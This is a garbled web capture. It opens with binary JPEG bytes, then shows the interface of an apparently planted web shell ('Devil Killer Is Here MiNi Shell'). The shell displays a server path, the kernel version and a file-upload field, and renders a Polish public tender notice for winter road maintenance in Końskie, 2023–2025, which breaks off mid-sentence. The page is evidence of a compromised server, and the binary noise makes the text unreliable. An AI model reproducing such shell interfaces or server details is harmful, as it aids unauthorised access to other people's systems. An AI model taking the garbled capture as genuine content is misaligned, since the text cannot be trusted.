JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230823/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230823/0036315901-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Zimowe utrzymanie dróg na terenie miasta i gminy Końskie na lata 2023-2025 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Końskie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 291009797</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Partyzantów 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Końskie</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">26-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">świętokrzyskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL721 - Kielecki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@umkonskie.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.umkonskie.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zimowe utrzymanie dróg na terenie miasta i gminy Końskie na lata 2023-2025 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-ff108ce9-40ca-11ee-9aa3-96d3b4440790</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00363159</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-08-23</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00040922/07/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.3 Zimowe utrzymanie dróg położonych na terenie gminy Końskie</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-ff108ce9-40ca-11ee-9aa3-96d3b4440790 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl/.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W postępowaniu o udzielenie<br/>zamówienia publicznego komunikacja między<br/>Zamawiającym, a Wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest<br/>dostępna pod adresem https://ezamowienia.gov.pl/.Korzystanie z Platformy e-Zamówienia jest bezpłatne.Wykonawca zamierzający<br/>wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie e-<br/>Zamówienia.Sposób sporządzenia dokumentów elektronicznych lub dokumentów elektronicznychbędących kopią elektroniczną<br/>treści zapisanej w postaci papierowej (cyfrowe odwzorowania)musi być zgodny z wymaganiami określonymi w rozporządzeniu<br/>Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji orazwymagań<br/>technicznych dla dokumentów elektronicznych oraz środków komunikacjielektronicznej w postępowaniu o udzielenie zamówienia<br/>publicznego lub konkursie.Dokumenty elektroniczne, o których mowa w § 2 ust. 1 rozporządzenia o jakim mowa w pkt 6.22 SWZ,<br/>sporządza się w postaci elektronicznej, w formatach danych określonych w przepisach rozporządzenia Rady Ministrów z dnia 12<br/>kwietnia 2012 r. w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji<br/>w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych, z uwzględnieniem rodzaju przekazywanych<br/>danych i przekazuje się jako załączniki. W przypadku formatów, o których mowa w art. 66 ust. 1 ustawy Pzp, ww. regulacje nie będą<br/>miały bezpośredniego zastosowania.Formaty plików wykorzystywanych przez wykonawców powinny być zgodne z rozporządzeniem<br/>Rady Ministrów z dnia 12 kwietnia 2012 r. w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów<br/>publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych(t. jedn. Dz.<br/>U. 2017 poz. 2247). Zamawiający rekomenduje wykorzystanie formatów: .pdf .doc.xls .jpg (.jpeg) ze szczególnym wskazaniem na<br/>.pdf. W celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z formatów: .zip albo .7Z.<br/>Komunikacja w postępowaniu, z wyłączeniem składania ofert odbywa się drogą<br/>elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”). Za<br/>pośrednictwem „Formularzy do komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i<br/>udzielanie odpowiedzi. Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej wiadomości (przycisk<br/>„dodaj załącznik”).Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB<br/>(wielkość ta dotyczy plików przesyłanych jako załączniki do jednego formularza).<br/>W szczególnie uzasadnionych przypadkach uniemożliwiających komunikację<br/>Wykonawcy i Zamawiającego za pośrednictwem Platformy e-Zamówienia, Zamawiający<br/>dopuszcza komunikację za pomocą poczty elektronicznej na adres e-mail: przetargi@umkonskie.pl (nie dotyczy składania ofert w<br/>postępowaniu).Sposób sporządzenia dokumentów elektronicznych musi być zgody z wymaganiamiokreślonymi w rozporządzeniu<br/>Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie<br/>sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla<br/>dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu<br/>o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 r. poz. 2452) oraz rozporządzeniu Ministra Rozwoju, Pracy i<br/>Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń,<br/>jakich może żądać zamawiający od wykonawcy (Dz. U. z 2020 r. poz. 2415)</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy<br/>95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z04.05.2016, str. 1), dalej „RODO”,<br/>Zamawiający informuje, że: -administratorem Pani/Pana danych<br/>osobowych jest Urząd Miasta i Gminy w Końskich ul. Partyzantów 1, 26-200 Końskie,Pani/Pana dane<br/>osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego pn.Termomodernizacja budynków użyteczności publiczne- Sworzyce w trybie<br/>podstawowym na podst. art. 275 pkt 1 ustawy pzp,-odbiorcami Pani/Pana danych osobowych będą<br/>osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 74ustawy Pzp”; -Pani/Pana dane<br/>osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp,<br/>przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwaniaumowy przekracza 4 lata, okres<br/>przechowywania obejmuje cały czas trwania umowy;-obowiązek<br/>podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w<br/>przepisach ustawy Pzp, związanym z udziałem w postępowaniu o<br/>udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawyPzp; -w odniesieniu<br/>doPani/Panadanych osobowych decyzje nie będą podejmowane w sposóbzautomatyzowany, stosowanie do art. 22<br/>RODO;-posiada Pani/Pan:- na podstawie art. 15RODOprawo dostępu do danych osobowych<br/>Pani/Pana dotyczących;- na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych<br/>osobowych **;- na podstawie art. 18 RODO prawo żądania od administratora ograniczenia<br/>przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO***; - prawo do wniesienia<br/>skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan,<br/>że przetwarzanie danych osobowych Pani/Pana dotyczących na ruszaprzepisy RODO;-nie przysługuje<br/>Pani/Panu:- w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;-<br/>prawo do przenoszenia danych osobowych, o którym mowa wart. 20RODO;- na podstawie art. 21<br/>RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną<br/>przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.Jednocześnie Zamawiający<br/>przypomina o ciążącym na Pani/Panu obowiązku informacyjnym wynikającym z art. 14 RODO<br/>względem osób fizycznych, których dane przekazane zostaną Zamawiającemu w związku z<br/>prowadzonym postępowaniem i które Zamawiający pośredniopozyskaod Wykonawcy biorącego udział w postępowaniu, chyba że<br/>ma zastosowanie co najmniej jedno zwyłączeń, o których mowa w art. 14 ust<br/>5 RODO</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP-271.1.22.2023.EP</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiot zamówienia (zad. 1-3): Zimowe utrzymanie dróg położonych na terenie miasta i gminy Końskie .<br/>Ustalenia zawarte w specyfikacjach : D – 10.10.01b, D – 10.10.01c dotyczą wykonania prac związanych<br/> z odśnieżaniem i ze zwalczaniem śliskości dróg gminnych i ulic miejskich.<br/>Zadanie Nr 1 – Zimowe utrzymanie dróg na terenie gminy przy zastosowaniu mieszanki piasku <br/>i soli w sezonach zimowych 2023-2025,<br/>Zadanie Nr 2 – Zimowe utrzymanie ulic na terenie miasta Końskie przy zastosowaniu solanki lub soli oraz odśnieżanie chodników w sezonach zimowych 2023-2025,<br/>Zadanie Nr 3 – Zimowe utrzymanie ulic na terenie miasta Końskie przy zastosowaniu mieszanki piasku <br/>i soli w sezonach zimowych 2023-2025,<br/>Wykonawca zapewnia własny sprzęt (wg warunków zamówienia), materiały do likwidacji śliskości (piasek, sól, solanka), osobę bądź osoby do pełnienia dyżuru, urządzenia GPS do lokalizowania sprzętu biorącego udział w akcji zimowej oraz miejsce do magazynowania materiałów <br/>i sprzętu, przez cały okres umowy.<br/>1.	Rodzaje akcji zimowego utrzymania.<br/>1.1	Akcja czynna.<br/>Akcja czynna polega na bieżącym usuwaniu z pasów ruchu gromadzącego się w czasie opadów śniegu, tak aby utrzymać drogę w określonym standardzie i bieżącym usuwaniu śliskości poprzez posypywanie materiałem uszorstniającym lub środkami chemicznymi.<br/>Za piaskarką lub solarką ma pozostać widoczny na całej szerokości jezdni ślad rozsypanych środków uszorstniających. Nadmiar śniegu Wykonawca wywozi w miejsce wskazane przez zamawiającego.<br/>1.2	Akcja patrolowa.<br/>Akcja patrolowa polega na patrolowaniu przydzielonych odcinków dróg i w razie konieczności ich interwencyjnym odśnieżaniu i usuwaniu śliskości poprzez posypywanie materiałem uszorstniającym lub środkami chemicznymi – przez pojęcie interwencyjne odśnieżanie i usuwanie śliskości należy rozumieć wykonanie tych robót na odcinku do 30% z zakresu prowadzenia akcji czynnej.<br/>Akcja czynna lub patrolowa będzie rozpatrywana w dwóch przedziałach czasowych:<br/>-	I od godz. 300 do godz. 1500<br/>-	II od godz. 1500 do godz. 300 <br/>a płatność za dany przedział czasowy będzie wynosić w przypadku akcji czynnej 50% <br/>a w przypadku akcji patrolowej 25% stawki za zimowe utrzymanie 1 km drogi dziennie. <br/>2.	Zasady prowadzenia akcji zimowego utrzymania.<br/>2.1	Osobą decydującą o rodzaju i terminie prowadzonej akcji zimowego utrzymania dróg będzie Koordynator wyznaczony przez Burmistrza Miasta i Gminy Końskie i wymieniony <br/>w umowie o utrzymanie zimowe dróg. <br/>2.2	Wykonawca gwarantuje pełną gotowość do prowadzenia akcji zimowego utrzymania dróg <br/>w ciągu 1 godziny od otrzymania sygnału od Zamawiającego. <br/>2.3	W okresie trwania akcji zimowego utrzymania dróg Wykonawca podejmuje samodzielnie decyzje w zakresie rodzaju i ilości użytego sprzętu.<br/>2.4	W przypadku ustabilizowanych warunków pogodowych niewymagających prac zimowego utrzymania dróg, Zamawiający ma prawo zawiesić czynności związane z zimowym utrzymaniem i za ten okres nie przysługuje wynagrodzenie. Po sygnale o ponownym uruchomieniu akcji przez Zamawiającego, Wykonawca jest zobowiązany w ciągu 1 godzin osiągnąć pełną gotowość do pracy. W ramach umowy Zamawiający może wskazać konkretne zakresy rzeczowe, bez konieczności uruchamiania całości zimowego utrzymania.<br/>2.5	W przypadku nagłej zmiany warunków pogodowych Wykonawca sam podejmuje decyzję <br/>o rodzaju wprowadzenia akcji zimowego utrzymania, po powiadomieniu telefonicznym Zamawiającego.<br/>2.6	Wykonawca pokrywa pełną wysokość ewentualnych szkód na rzecz osób trzecich powstałych na skutek niewłaściwego wykonania prac. <br/>2.7	W okresie prowadzenia akcji zimowego utrzymania Wykonawca zapewnia:<br/>-	dyżurną służbę telefoniczną przez całą dobę.<br/>-	system łączności Wykonawcy ze sprzętem użytym w akcji.<br/>-	prowadzenie ewidencji i dokumentacji robót wykonywanych w czasie trwania akcji zimowej,<br/>-	urządzenia GPS do lokalizowania pojazdów biorących udział w akcji zimowego utrzymania dróg . <br/>3.	Zasady odbioru robót zimowego utrzymania dróg.<br/>Odbiorowi podlega odśnieżanie i zwalczanie śliskości zimowej. Odbioru dokonuje Koordynator wyznaczony przez Burmistrza Miasta i Gminy Końskie.<br/>W przypadku nie należytego wykonania zadań związanych z prowadzeniem akcji zimowej Wykonawca musi ponownie wykonać usługę zimowego utrzymania dróg bez wynagrodzenia za dany przedział czasowy.<br/>Obmiar robót będzie dokonywany w dwóch przedziałach czasowych: <br/>	I od godz. 300 do godz. 1500<br/>	II od godz. 1500 do godz. 300<br/>Jednostką obmiarową będzie 1 km utrzymanego odcinka drogi dziennie (w ciągu doby). <br/>W przypadku uruchomienia akcji w poszczególnym przedziale czasowym Wykonawca otrzyma <br/>w tym przedziale wynagrodzenie będące iloczynem ilości kilometrów oraz 50% w przypadku akcji czynnej ceny utrzymania 1km dziennie, 25% w przypadku akcji patrolowej, natomiast <br/>w przypadku, gdy akcja zimowa w danym przedziale czasowym nie zostanie uruchomiona wówczas Wykonawcy nie przysługuje wynagrodzenie za ten przedział czasowy. Zamawiający ma prawo zmniejszyć ilość jednostek obmiarowych po sprawdzeniu jakości wykonanej usługi.<br/>Uwaga do zadania nr 2 – Zimowe utrzymanie ulic na terenie miasta Końskie przy zastosowaniu solanki lub soli oraz odśnieżanie chodników w sezonach zimowych 2023-2025. Jednostka obmiarowa 1 godzina pracy miniciągnika (odśnieżanie chodników). <br/>4.	Termin przygotowania do prowadzenia akcji zimowego utrzymania dróg.<br/>Wykonawca gwarantuje gotowość przystąpienia do akcji zimowej w okresach <br/>15.10.2023r. do 30.04.2024r. – 198 dni<br/>15.10.2024 r. do 30.04.2025 r. – 197 dni <br/>5.	Wykaz dróg objętych zimowym utrzymaniem dróg zawierają załączniki nr 1 do zadań nr 1,2,3. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90620000-9 - Usługi odśnieżania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2023-10-15 do 2025-04-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiot zamówienia (zad. 1-3): Zimowe utrzymanie dróg położonych na terenie miasta i gminy Końskie .<br/>Ustalenia zawarte w specyfikacjach : D – 10.10.01b, D – 10.10.01c dotyczą wykonania prac związanych<br/> z odśnieżaniem i ze zwalczaniem śliskości dróg gminnych i ulic miejskich.<br/>Zadanie Nr 1 – Zimowe utrzymanie dróg na terenie gminy przy zastosowaniu mieszanki piasku <br/>i soli w sezonach zimowych 2023-2025,<br/>Zadanie Nr 2 – Zimowe utrzymanie ulic na terenie miasta Końskie przy zastosowaniu solanki lub soli oraz odśnieżanie chodników w sezonach zimowych 2023-2025,<br/>Zadanie Nr 3 – Zimowe utrzymanie ulic na terenie miasta Końskie przy zastosowaniu mieszanki piasku <br/>i soli w sezonach zimowych 2023-2025,<br/>Wykonawca zapewnia własny sprzęt (wg warunków zamówienia), materiały do likwidacji śliskości (piasek, sól, solanka), osobę bądź osoby do pełnienia dyżuru, urządzenia GPS do lokalizowania sprzętu biorącego udział w akcji zimowej oraz miejsce do magazynowania materiałów <br/>i sprzętu, przez cały okres umowy.<br/>1.	Rodzaje akcji zimowego utrzymania.<br/>1.1	Akcja czynna.<br/>Akcja czynna polega na bieżącym usuwaniu z pasów ruchu gromadzącego się w czasie opadów śniegu, tak aby utrzymać drogę w określonym standardzie i bieżącym usuwaniu śliskości poprzez posypywanie materiałem uszorstniającym lub środkami chemicznymi.<br/>Za piaskarką lub solarką ma pozostać widoczny na całej szerokości jezdni ślad rozsypanych środków uszorstniających. Nadmiar śniegu Wykonawca wywozi w miejsce wskazane przez zamawiającego.<br/>1.2	Akcja patrolowa.<br/>Akcja patrolowa polega na patrolowaniu przydzielonych odcinków dróg i w razie konieczności ich interwencyjnym odśnieżaniu i usuwaniu śliskości poprzez posypywanie materiałem uszorstniającym lub środkami chemicznymi – przez pojęcie interwencyjne odśnieżanie i usuwanie śliskości należy rozumieć wykonanie tych robót na odcinku do 30% z zakresu prowadzenia akcji czynnej.<br/>Akcja czynna lub patrolowa będzie rozpatrywana w dwóch przedziałach czasowych:<br/>-	I od godz. 300 do godz. 1500<br/>-	II od godz. 1500 do godz. 300 <br/>a płatność za dany przedział czasowy będzie wynosić w przypadku akcji czynnej 50% <br/>a w przypadku akcji patrolowej 25% stawki za zimowe utrzymanie 1 km drogi dziennie. <br/>2.	Zasady prowadzenia akcji zimowego utrzymania.<br/>2.1	Osobą decydującą o rodzaju i terminie prowadzonej akcji zimowego utrzymania dróg będzie Koordynator wyznaczony przez Burmistrza Miasta i Gminy Końskie i wymieniony <br/>w umowie o utrzymanie zimowe dróg. <br/>2.2	Wykonawca gwarantuje pełną gotowość do prowadzenia akcji zimowego utrzymania dróg <br/>w ciągu 1 godziny od otrzymania sygnału od Zamawiającego. <br/>2.3	W okresie trwania akcji zimowego utrzymania dróg Wykonawca podejmuje samodzielnie decyzje w zakresie rodzaju i ilości użytego sprzętu.<br/>2.4	W przypadku ustabilizowanych warunków pogodowych 